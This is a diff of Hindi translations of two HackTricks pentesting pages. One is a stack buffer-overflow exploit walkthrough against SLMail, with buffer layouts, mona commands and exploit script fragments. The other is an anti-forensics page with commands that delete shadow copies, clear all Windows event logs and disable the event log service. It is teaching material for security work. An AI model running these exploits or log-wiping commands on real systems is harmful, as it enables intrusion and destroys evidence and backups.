हर बार जब भी आपको **सेवा SLMail को पुनः आरंभ करने की आवश्यकता** होती है, तो आप विंडो कंसोल का उपयोग करके इसे कर सकते हैं: हर बार जब भी आपको **सेवा SLMail को पुनः आरंभ करने** की आवश्यकता होती है, तो आप विंडो कंसोल का उपयोग करके इसे कर सकते हैं:
``` ```
net start slmail net start slmail
``` ```
@ -48,25 +49,25 @@ print "Could not connect to "+ip+":"+port
``` ```
## **इम्यूनिटी डीबगर फ़ॉन्ट बदलें** ## **इम्यूनिटी डीबगर फ़ॉन्ट बदलें**
`विकल्प >> दिखावट >> फ़ॉन्ट >> बदलें(कंसोलस, बोल्ड, 9) >> ठीक है` जाएं `Options >> Appearance >> Fonts >> Change(Consolas, Blod, 9) >> OK`
## **प्रक्रिया को इम्यूनिटी डीबगर से जोड़ें:** ## **प्रक्रिया को इम्यूनिटी डीबगर से जोड़ें:**
**फ़ाइल --> जोड़ें** **File --> Attach**
![](<../.gitbook/assets/image (24) (1) (1).png>) ![](<../.gitbook/assets/image (24) (1) (1).png>)
**और स्टार्ट बटन दबाएं** **और START बटन दबाएं**
## **एक्सप्लॉइट भेजें और जांचें कि क्या ईआईपी प्रभावित है:** ## **एक्सप्लॉइट भेजें और जांचें कि क्या EIP प्रभावित है:**
![](<../.gitbook/assets/image (25) (1) (1).png>) ![](<../.gitbook/assets/image (25) (1) (1).png>)
हर बार जब आप सेवा को तोड़ते हैं, तो आपको इस पृष्ठ के शुरू में दिखाया गया है कि आपको इसे पुनः प्रारंभ करना चाहिए। हर बार जब आप सेवा को ब्रेक करते हैं, तो आपको इस पृष्ठ के शुरू में दिखाया गया है कि इसे पुनः आरंभ करना चाहिए।
## ईआईपी को संशोधित करने के लिए एक पैटर्न बनाएं ## EIP को संशोधित करने के लिए एक पैटर्न बनाएं
पैटर्न उस बफर के बराबर होना चाहिए जिसका आपने पहले सेवा को तोड़ने के लिए उपयोग किया था। पैटर्न उसी बफर के बड़ा होना चाहिए जिसका आपने पिछले में सेवा को तोड़ने के लिए उपयोग किया था।
![](<../.gitbook/assets/image (26) (1) (1).png>) ![](<../.gitbook/assets/image (26) (1) (1).png>)
``` ```
@ -86,7 +87,7 @@ print "Could not connect to "+ip+":"+port
``` ```
लगता है **हम बफर के ऑफसेट 2606 में EIP को संशोधित कर सकते हैं** लगता है **हम बफर के ऑफसेट 2606 में EIP को संशोधित कर सकते हैं**
इसे जांचने के लिए एक्सप्लॉइट के बफर को संशोधित करें: एक्सप्लॉइट के बफर को संशोधित करने की जांच करें:
``` ```
buffer = 'A'*2606 + 'BBBB' + 'CCCC' buffer = 'A'*2606 + 'BBBB' + 'CCCC'
``` ```
@ -98,9 +99,9 @@ buffer = 'A'*2606 + 'BBBB' + 'CCCC'
लगता है काम कर रहा है। लगता है काम कर रहा है।
## स्टैक के अंदर शलकोड स्थान की जांच करें ## स्टैक के अंदर शलकोड स्थान की जांच करें
600B किसी भी शक्तिशाली शलकोड के लिए पर्याप्त होना चाहिए। 600B किसी भी शक्तिशाली शलकोड के लिए पर्याप्त होना चाहिए।
चलिए बफर बदलते हैं: चलिए बफर बदलते हैं:
``` ```
@ -114,9 +115,9 @@ buffer = 'A'*2606 + 'BBBB' + 'C'*600
आप देख सकते हैं कि जब सुरक्षा दोष तक पहुंचा जाता है, तो EBP शेलकोड की ओर प्वाइंट कर रहा है और हमें यहां एक शेलकोड स्थानित करने के लिए बहुत जगह है। आप देख सकते हैं कि जब सुरक्षा दोष तक पहुंचा जाता है, तो EBP शेलकोड की ओर प्वाइंट कर रहा है और हमें यहां एक शेलकोड स्थानित करने के लिए बहुत जगह है।
इस मामले में हमारे पास **0x0209A128 से 0x0209A2D6 = 430B** है। पर्याप्त। इस मामले में हमारे पास **0x0209A128 से 0x0209A2D6 = 430B तक** है। पर्याप्त।
## बुर वर्णों के लिए जांच करें ## बुर वर्णों के लिए जांच करें
फिर से बफर बदलें: फिर से बफर बदलें:
``` ```
@ -140,13 +141,13 @@ badchars = (
) )
buffer = 'A'*2606 + 'BBBB' + badchars buffer = 'A'*2606 + 'BBBB' + badchars
``` ```
बैडचार्स 0x01 से शुरू होता है क्योंकि 0x00 लगभग हमेशा बुरा होता है। बैडचार्स 0x01 से शुरू होते हैं क्योंकि 0x00 लगभग हमेशा बेकार होता है।
इस नए बफर के साथ एक्सप्लॉइट को बार-बार निष्पादित करें जिसमें वे वर्ण हटाए जाते हैं जो अनुपयोगी पाए जाते हैं: इस नए बफर के साथ एक्सप्लॉइट को बार-बार निष्पादित करें जिसमें वे वर्ण हटाए जाते हैं जो अनुपयोगी पाए जाते हैं।
उदाहरण के लिए: उदाहरण के लिए:
इस मामले में आप देख सकते हैं कि **आपको वर्ण 0x0A का उपयोग नहीं करना चाहिए** (क्योंकि मेमोरी में कुछ भी सहेजा नहीं गया है क्योंकि वर्ण 0x09)। इस मामले में आप देख सकते हैं कि **आपको वर्ण 0x0A का उपयोग नहीं करना चाहिए** (क्योंकि वर्ण 0x09 मेमोरी में कुछ भी सहेजा नहीं गया है)।
![](<../.gitbook/assets/image (33) (1).png>) ![](<../.gitbook/assets/image (33) (1).png>)
@ -160,7 +161,7 @@ buffer = 'A'*2606 + 'BBBB' + badchars
``` ```
!mona modules #Get protections, look for all false except last one (Dll of SO) !mona modules #Get protections, look for all false except last one (Dll of SO)
``` ```
आपको **मेमोरी मैप्स की सूची** बनानी ह। कुछ DLL खोजें जिसमें: आपको **मेमोरी मैप्स की सूची** बनानी होगी। कुछ DLL खोजें जिसमें:
* **Rebase: False** * **Rebase: False**
* **SafeSEH: False** * **SafeSEH: False**
@ -170,12 +171,12 @@ buffer = 'A'*2606 + 'BBBB' + badchars
![](<../.gitbook/assets/image (35) (1).png>) ![](<../.gitbook/assets/image (35) (1).png>)
अब, इस मेमोरी के अंदर आपको कुछ JMP ESP बाइट्स ढूंढने होंगे, इसके लिए निम्नलिखित को चलाएं: अब, इस मेमोरी के अंदर आपको कुछ JMP ESP बाइट्स ढूंढने होंगे, इसे करने के लिए निम्नलिखित को चलाएं:
``` ```
!mona find -s "\xff\xe4" -m name_unsecure.dll # Search for opcodes insie dll space (JMP ESP) !mona find -s "\xff\xe4" -m name_unsecure.dll # Search for opcodes insie dll space (JMP ESP)
!mona find -s "\xff\xe4" -m slmfc.dll # Example in this case !mona find -s "\xff\xe4" -m slmfc.dll # Example in this case
``` ```
**फिर, यदि कोई पता मिल जाता है, तो उसमें से एक चुनें जिसमें कोई भी बुरी चर न हो:** **फिर, यदि कोई पता मिल जाता है, तो उसमें से एक चुनें जिसमें कोई भी बुरी वर्ण (badchar) न हो:**
![](<../.gitbook/assets/image (36) (1).png>) ![](<../.gitbook/assets/image (36) (1).png>)
@ -238,7 +239,7 @@ except:
print "Could not connect to "+ip+":"+port print "Could not connect to "+ip+":"+port
``` ```
{% hint style="warning" %} {% hint style="warning" %}
ऐसे शेलकोड होते हैं जो अपने आप को **अधिलेखित** कर देते हैं, इसलिए हमेशा शेलकोड के पहले कुछ NOPs जोड़ना महत्वपूर्ण है ऐसे शेलकोड हैं जो अपने आप को **अधिलिखित** कर देंगे, इसलिए हमेशा शेलकोड से पहले कुछ NOPs जोड़ना महत्वपूर्ण है
{% endhint %} {% endhint %}
## शेलकोड को बेहतर बनाना ## शेलकोड को बेहतर बनाना
@ -247,16 +248,17 @@ print "Could not connect to "+ip+":"+port
``` ```
EXITFUNC=thread -e x86/shikata_ga_nai EXITFUNC=thread -e x86/shikata_ga_nai
``` ```
{% hint style="success" %}
**AWS हैकिंग सीखें और अभ्यास करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
**GCP हैकिंग सीखें और अभ्यास करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
दूसरे तरीके HackTricks का समर्थन करने के लिए: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) ज्वाइन करें या [**टेलीग्राम समूह**](https://t.me/peass) में शामिल हों या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) देखें! * [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके हैकिंग ट्रिक्स साझा करें।
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details> </details>
{% endhint %}

View file

@ -1,143 +1,142 @@
{% hint style="success" %}
सीखें और प्रैक्टिस करें AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* अगर आप अपनी कंपनी का विज्ञापन **HackTricks** में देखना चाहते हैं या **HackTricks को PDF में डाउनलोड** करना चाहते हैं तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) देखें! * **हैकिंग ट्रिक्स साझा करें** द्वारा PRs सबमिट करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारा संग्रह [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details> </details>
{% endhint %}
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure> <figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %} {% embed url="https://websec.nl/" %}
# समय-चिह्न # टाइमस्टैम्प
किसी हमलावर को **फ़ाइलों के समय-चिह्नों को बदलने** में दिलचस्पी हो सकती है।\ एक हमलावता **फ़ाइलों के टाइमस्टैम्प को बदलने** में रुचि रख सकता है।\
एमएफटी में समय-चिह्न ढूंढना संभव है जो गुणों `$STANDARD_INFORMATION` __ और __ `$FILE_NAME` में हैं। एमएफटी में टाइमस्टैम्प्स को खोजना संभव है जो विशेषता `$STANDARD_INFORMATION` __ और __ `$FILE_NAME` में हैं।
दोनों गुणों में 4 समय-चिह्न होते हैं: **संशोधन**, **पहुंच**, **निर्माण**, और **एमएफटी रजिस्ट्री संशोधन** (MACE या MACB)। दोनों विशेषताएँ 4 टाइमस्टैम्प्स रखती हैं: **संशोधन**, **पहुंच**, **निर्माण**, और **एमएफटी रजिस्ट्री संशोधन** (MACE या MACB)।
**Windows एक्सप्लोरर** और अन्य उपकरण **`$STANDARD_INFORMATION`** से जानकारी दिखाते हैं। **Windows एक्सप्लोरर** और अन्य उपकरण **`$STANDARD_INFORMATION`** से जानकारी दिखाते हैं।
## टाइमस्टॉम्प - एंटी-फोरेंसिक टूल ## टाइमस्टॉम्प - एंटी-फोरेंसिक टूल
यह उपकरण **`$STANDARD_INFORMATION`** के भीतर समय-चिह्न जानकारी को **संशोधित करता है** **लेकिन** **`$FILE_NAME`** के भीतर की जानकारी को **नहीं**। इसलिए, यह संदेहास्पद गतिविधि की पहचान करना संभव है। यह टूल **`$STANDARD_INFORMATION`** के भीतर टाइमस्टैम्प जानकारी को **संशोधित** करता है **लेकिन** **`$FILE_NAME`** के भीतर जानकारी को **नहीं**। इसलिए, यह संदेहास्पद गतिविधि की पहचान करना संभव है।
## Usnjrnl ## Usnjrnl
**USN Journal** (अपडेट सीक्वेंस नंबर जर्नल) NTFS (Windows NT फ़ाइल सिस्टम) का एक विशेषता है जो वॉल्यूम परिवर्तनों का पता लगाता है। [**UsnJrnl2Csv**](https://github.com/jschicht/UsnJrnl2Csv) उपकरण इन परिवर्तनों का परीक्षण करने की अनुमति देता है। **USN जर्नल** (अपडेट सीक्वेंस नंबर जर्नल) एनटीएफएस (विंडोज एनटी एफएस फ़ाइल सिस्टम) की एक विशेषता है जो वॉल्यूम परिवर्तनों का पता रखती है। [**UsnJrnl2Csv**](https://github.com/jschicht/UsnJrnl2Csv) टूल इन परिवर्तनों की जांच करने की अनुमति देता है।
![](<../../.gitbook/assets/image (449).png>) ![](<../../.gitbook/assets/image (449).png>)
पिछली छवि उपकरण द्वारा दिखाई गई **आउटपुट** है जहां देखा जा सकता है कि कुछ **परिवर्तन किए गए थे** फ़ाइल में। पिछली छवि टूल द्वारा दिखाई गई **आउटपुट** है जहां देखा जा सकता है कि कुछ **परिवर्तन किए गए थे** फ़ाइल में।
## $LogFile ## $LogFile
एक फ़ाइल सिस्टम में सभी मेटाडेटा परिवर्तनों को एक प्रक्रिया में लॉग किया जाता है जिसे [व्राइट-अहेड लॉगिंग](https://en.wikipedia.org/wiki/Write-ahead_logging) के रूप में जाना जाता है। लॉग किए गए मेटाडेटा को `**$LogFile**` नामक एक फ़ाइल में रखा जाता है, जो एक NTFS फ़ाइल सिस्टम के मूल निर्देशिका में स्थित है। [LogFileParser](https://github.com/jschicht/LogFileParser) जैसे उपकरण का उपयोग इस फ़ाइल को पार्स करने और परिवर्तनों की पहचान करने के लिए किया जा सकता है। एक फ़ाइल सिस्टम में सभी मेटाडेटा परिवर्तनों को एक प्रक्रिया में लॉग किया जाता है जिसे [राइट-अहेड लॉगिंग](https://en.wikipedia.org/wiki/Write-ahead_logging) के रूप में जाना जाता है। लॉग किए गए मेटाडेटा को `**$LogFile**` नामक एक फ़ाइल में रखा जाता है, जो एनटीएफएस फ़ाइल सिस्टम के मूल निर्देशिका में स्थित है। [LogFileParser](https://github.com/jschicht/LogFileParser) जैसे उपकरण का उपयोग इस फ़ाइल को पार्स करने और परिवर्तनों की पहचान करने के लिए किया जा सकता है।
![](<../../.gitbook/assets/image (450).png>) ![](<../../.gitbook/assets/image (450).png>)
फिर से, उपकरण के आउटपुट में देखा जा सकता है कि **कुछ परिवर्तन किए गए थे** फिर से, उपकरण के आउटपुट में देखा जा सकता है कि **कुछ परिवर्तन किए गए थे**
इसी उपकरण का उपयोग करके समय-चिह्नों को **किस समय संशोधित किया गया था** की पहचान करना संभव है: इसी उपकरण का उपयोग करके टाइमस्टैम्प्स को **किस समय संशोधित किया गया था** की पहचान करना संभव है:
![](<../../.gitbook/assets/image (451).png>) ![](<../../.gitbook/assets/image (451).png>)
* CTIME: फ़ाइल का निर्माण समय * CTIME: फ़ाइल का निर्माण समय
* ATIME: फ़ाइल का संशोधन समय * ATIME: फ़ाइल का संशोधन समय
* MTIME: फ़ाइल का MFT रजिस्ट्री संशोधन * MTIME: फ़ाइल का एमएफटी रजिस्ट्री संशोधन
* RTIME: फ़ाइल का पहुंच समय * RTIME: फ़ाइल का पहुंच समय
## `$STANDARD_INFORMATION` और `$FILE_NAME` तुलना ## `$STANDARD_INFORMATION` और `$FILE_NAME` तुलना
संदेहास्पद संशोधित फ़ाइलों की पहचान करने के लिए एक और तरीका होगा कि दोनों गुणों पर समय की तुलना करें और **मिलान** के लिए देखें **असंगतियाँ** संदेहास्पद संशोधित फ़ाइलों की पहचान करने का एक और तरीका होगा कि दोनों विशेषताओं पर समय की तुलना करें और **मिलान** के लिए देखें **असंगतियाँ**
## नैनोसेकंड ## नैनोसेकंड
**NTFS** समय-चिह्नों का एक **प्रेसिजन** है **100 नैनोसेकंड**। फिर, 2010-10-10 10:10:**00.000:0000 जैसे समय-चिह्न वाली फ़ाइलें खोजना बहुत संदेहास्पद है। **एनटीएफएस** टाइमस्टैम्प्स का एक **प्रेसिजन** है **100 नैनोसेकंड**। फिर, 2010-10-10 10:10:**00.000:0000 जैसे टाइमस्टैम्प्स वाली फ़ाइलें खोजना बहुत संदेहास्पद है**
## SetMace - एंटी-फोरेंसिक टूल ## SetMace - एंटी-फोरेंसिक टूल
यह उपकरण दोनों गुणों `$STARNDAR_INFORMATION` और `$FILE_NAME` को संशोधित कर सकता है। हालांकि, Windows Vista से, इस जानकारी को संशोधित करने के लिए लाइव ओएस की आवश्यकता है। यह उपकरण दोनों विशेषताएँ `$STARNDAR_INFORMATION` और `$FILE_NAME` को संशोधित कर सकता है। हालांकि, Windows Vista से, इस जानकारी को संशोधित करने के लिए एक लाइव ओएस की आवश्यकता है।
# डेटा छुपाना # डेटा छुपाना
NFTS एक क्लस्टर और न्यूनतम जानकारी आकार का उपयोग करता है। इसका मतलब है कि यदि एक फ़ाइल एक क्लस्टर और आधा उपयोग करती है, तो **शेष आधा कभी भी उपयोग नहीं होगा** जब तक फ़ाइल हटाई नहीं जाती। फिर, इस "छिपी" जगह में डेटा छुपाना संभव है। एनएफटीएस एक क्लस्टर और न्यूनतम जानकारी आकार का उपयोग करता है। इसका मतलब है कि यदि एक फ़ाइल एक क्लस्टर और आधा उपयोग करती है, तो **शेष आधा कभी भी उपयोग नहीं होगा** जब तक फ़ाइल हटाई नहीं जाती। फिर, इस "छपी" जगह में डेटा छुपाना संभव है।
इस तरह के "छिपी" जगह में डेटा छुपाने की अनुमति देने वाले उपकरण जैसे slacker हैं। हालांकि, `$logfile` और `$usnjrnl` का विश्लेषण दिखा सकता है कि कुछ डेटा जोड़ा गया था: इस तरह के "छुपे" स्थान में डेटा छुपाने की अनुमति देने वाले उपकरण जैसे slacker हैं। हालांकि, `$logfile` और `$usnjrnl` का विश्लेषण दिखा सकता है कि कुछ डेटा जोड़ा गया था:
![](<../../.gitbook/assets/image (452).png>) ![](<../../.gitbook/assets/image (452).png>)
फिर, FTK Imager जैसे उपकरण का उपयोग करके छिपी जगह पुनः प्राप्त किया जा सकता है। ध्यान दें कि इस प्रकार के उपकरण सामग्री को अंधाकृत या यहाँ तक कि एन्क्रिप्टेड भी सहेज सकते हैं। फिर, FTK इमेजर जैसे उपकरण का उपयोग करके छुपे स्थान को पुनः प्राप्त किया जा सकता है। ध्यान दें कि इस प्रकार के उपकरण सामग्री को अस्पष्ट या यहाँ तक कि एन्क्रिप्टेड भी सहेज सकते हैं।
# UsbKill # UsbKill
यह एक उपकरण है जो **USB** पोर्ट में किसी भी परिवर्तन को डिटेक्ट करता है तो कंप्यूटर को **बंद कर देगा**।\ यह एक उपकरण है जो कंप्यूटर को **USB** पोर्ट में किसी भी परिवर्तन को डिटेक्ट करता है तो बंद कर देगा।\
इसे खोजने का एक तरीका है कि चल रहे प्रक्रियाओं की जांच करें और **प्रत्येक पायथन स्क्रिप्ट की जांच** करें। इसे खोजने का एक तरीका है कि चल रहे प्रक्रियाओं की जांच करें और **प्रत्येक पायथन स्क्रिप्ट की जांच** करें।
# लाइव लिनक्स वितरण # लाइव लिनक्स वितरण
ये डिस्ट्रो **रैम मेमोरी के अंदर चलाए जाते हैं**। इन्हें पहचानने का एकमात्र तरीका है **यदि NTFS फाइल-सिस्टम को लेखन अनुमतियों के साथ माउंट किया गया है**। यदि यह केवल पढ़ने की अनुमतियों के साथ माउंट किया गया है तो उपद्रव का पता लगाना संभव नहीं होगा। ये डिस्ट्रो **रैम** मेमोरी के अंदर **चलाए जाते हैं**। इन्हें पहचानने का एकमात्र तरीका है **यदि एनटीएफएस फाइल-सिस्टम को लेखन अनुमतियों के साथ माउंट किया गया है**। यदि यह केवल पढ़ने की अनुमति के साथ माउंट किया गया है तो उपद्रव का पता लगाना संभव नहीं होगा।
# सुरक्षित मिटाना # सुरक्षित मिटाना
[https://github.com/Claudio-C/awesome-data-sanitization](https://github.com/Claudio-C/awesome-data-sanitization) [https://github.com/Claudio-C/awesome-data-sanitization](https://github.com/Claudio-C/awesome-data-sanitization)
# Windows कॉन्फ़िगरेशन # विंडोज कॉन्फ़िगरेशन
फोरेंसिक्स जांच को कठिन बनाने के लिए कई विंडोज लॉगिंग विधियों को अक्षम करना संभव है। फोरेंसिक्स जांच को कठिन बनाने के लिए कई विंडोज लॉगिंग विधियों को अक्षम करना संभव है।
## समय-चिह्नों को अक्षम करें - UserAssist ## टाइमस्टैम्प्स को अक्षम करें - UserAssist
यह एक रजिस्ट्री कुंजी है जो प्रत्येक क्रियाशील द्वारा चलाई गई प्रत्येक कार्यक्रम के दिनांक और घंटे को बनाए रखती है। यह एक रजिस्ट्री कुंजी है जो प्रत्येक एक्जीक्यूटेबल को उपयोगकर्ता द्वारा चलाया गया था जब तारीख और समय बनाए रखती है।
UserAssist को अक्षम करने के लिए दो कदम हैं: UserAssist को अक्षम करने के लिए दो
1. दो रजिस्ट्री कुंजियों को सेट करें, `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackProgs` और `HKEY_CURRENT_USER\SOFTWARE
## हटाएं USB इतिहास ## हटाएं USB इतिहास
सभी **USB डिवाइस एंट्रीज** Windows रजिस्ट्री में **USBSTOR** रजिस्ट्री कुंजी के तहत संग्रहीत होती हैं जो उपकंजी शामिल करती हैं जो जब भी आप अपने PC या लैपटॉप में एक USB डिवाइस प्लग करते हैं। आप इस कुंजी को यहाँ पा सकते हैं `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR`**इसे हटाने** से आप USB इतिहास को हटा देंगे।\ सभी **USB डिवाइस एंट्रीज** Windows रजिस्ट्री में **USBSTOR** रजिस्ट्री कुंजी के तहत संग्रहीत होती हैं जिसमें उप-कुंजी होती हैं जो जब भी आप अपने PC या लैपटॉप में USB डिवाइस प्लग करते हैं तो बनाई जाती हैं। आप इस कुंजी को यहाँ पा सकते हैं `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR`**इसे हटाने** से आप USB इतिहास को हटा देंगे।\
आप इसे हटाने के लिए उपकरण [**USBDeview**](https://www.nirsoft.net/utils/usb_devices_view.html) का भी उपयोग कर सकते हैं (और न्हें हटाने के लिए)। आप इसे हटाने के लिए उपकरण [**USBDeview**](https://www.nirsoft.net/utils/usb_devices_view.html) का भी उपयोग कर सकते हैं (और न्हें हटाने के लिए)।
एक और फ़ाइल जो USBs के बारे में जानकारी सहेजती है, वह है फ़ाइल `setupapi.dev.log` `C:\Windows\INF` के अंदर। इसे भी हटाया जाना चाहिए। एक और फ़ाइल जो USBs के बारे में जानकारी सहेजती है वह है `setupapi.dev.log` जो `C:\Windows\INF` के अंदर होती है। इसे भी हटाना चाहिए।
## शैडो कॉपियों को अक्षम करें ## शैडो कॉपियों को अक्षम करें
`vssadmin list shadowstorage` के साथ शैडो कॉपियों की **सूची** बनाएं\ `vssadmin list shadowstorage` के साथ शैडो कॉपियों की **सूची** बनाएं\
उन्हें रन करके हटाएं `vssadmin delete shadow` उन्हें रन करके `vssadmin delete shadow` को **हटाएं**
आप GUI के माध्यम से भी उन्हें हटा सकते हैं जिसके लिए [यहाँ प्रस्तावित चरणों](https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html) का पालन करें। आप GUI के माध्यम से भी उन्हें हटा सकते हैं जिसके लिए [https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html](https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html) में प्रस्तावित चरणों का पालन करें।
शैडो कॉपियों को अक्षम करने के लिए [यहाँ से चरण](https://support.waters.com/KB_Inf/Other/WKB15560_How_to_disable_Volume_Shadow_Copy_Service_VSS_in_Windows): शैडो कॉपियों को अक्षम करने के लिए [यहाँ से चरण](https://support.waters.com/KB_Inf/Other/WKB15560_How_to_disable_Volume_Shadow_Copy_Service_VSS_in_Windows):
1. "सेवाएं" कार्यक्रम खोलें जिसे विंडोज स्टार्ट बटन पर क्लिक करने के बाद "सेवाएं" लिखकर टेक्स्ट खोज बॉक्स में टाइप करके। 1. "सेवाएं" कार्यक्रम खोलें जिसे विंडोज स्टार्ट बटन पर क्लिक करने के बाद "सेवाएं" लिखकर टेक्स्ट खोज बॉक्स में टाइप करके खोल सकते हैं
2. सूची से "वॉल्यूम शैडो कॉपी" ढूंढें, इसे चुनें, और फिर राइट-क्लिक करके प्रॉपर्टीज़ तक पहुचें। 2. सूची से "वॉल्यूम शैडो कॉपी" ढूंढें, इसे चुनें, और फिर राइट-क्लिक करके प्रॉपर्टीज़ तक पहुचें।
3. "स्टार्टअप प्रकार" ड्रॉप-डाउन मेनू से "डिसेबल्ड" चुनें, और फिर बदलाव की पुष्टि करने के लिए "एप्लाई" और "ओके" पर क्लिक करें। 3. "स्टार्टअप प्रकार" ड्रॉप-डाउन मेनू से "डिसेबल्ड" चुनें, और फिर बदलाव की पुष्टि करने के लिए "एप्लाई" और "ओके" पर क्लिक करें।
यह भी संभव है कि रजिस्ट्री में `HKLM\SYSTEM\CurrentControlSet\Control\BackupRestore\FilesNotToSnapshot` में कौन सी फ़ाइलें शैडो कॉपी में कॉपी की जाएंगी, उसकी विन्यास को संशोधित किया जा सकता है यह भी संभव है कि रजिस्ट्री में `HKLM\SYSTEM\CurrentControlSet\Control\BackupRestore\FilesNotToSnapshot` में कौन सी फ़ाइलें शैडो कॉपी में कॉपी की जाएंगी उनके विन्यास को संशोधित किया जा सके
## हटाएं हटाए गए फ़ाइलें ## हटाएं हटाए गए फ़ाइलें
* आप एक **Windows उपकरण** का उपयोग कर सकते हैं: `cipher /w:C` यह cipher को सी ड्राइव के उपलब्ध अप्रयुक्त डिस्क स्थान से किसी भी डेटा को हटाने के लिए संकेत देगा। * आप एक **Windows उपकरण** का उपयोग कर सकते हैं: `cipher /w:C` यह cipher को सी ड्राइव के उपलब्ध अप्रयुक्त डिस्क स्थान से किसी भी डेटा को हटाने के लिए संकेत देगा।
* आप [**Eraser**](https://eraser.heidi.ie) जैसे उपकरण भी उपयोग कर सकते हैं * आप [**Eraser**](https://eraser.heidi.ie) जैसे उपकरण भी उपयोग कर सकते हैं
## हटाएं Windows घटना लॉग ## हटाएं विंडोज घटना लॉग
* Windows + R --> eventvwr.msc --> "Windows Logs" को विस्तारित करें --> प्रत्येक श्रेणी पर राइट क्लिक करें और "क्लियर लॉग" चुनें * विंडोज + R --> eventvwr.msc --> "विंडोज लॉग" को विस्तारित करें --> प्रत्येक श्रेणी पर राइट क्लिक करें और "क्लियर लॉग" चुनें
* `for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"` * `for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"`
* `Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }` * `Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }`
## Windows घटना लॉग को अक्षम करें ## विंडोज घटना लॉग को अक्षम करें
* `reg add 'HKLM\SYSTEM\CurrentControlSet\Services\eventlog' /v Start /t REG_DWORD /d 4 /f` * `reg add 'HKLM\SYSTEM\CurrentControlSet\Services\eventlog' /v Start /t REG_DWORD /d 4 /f`
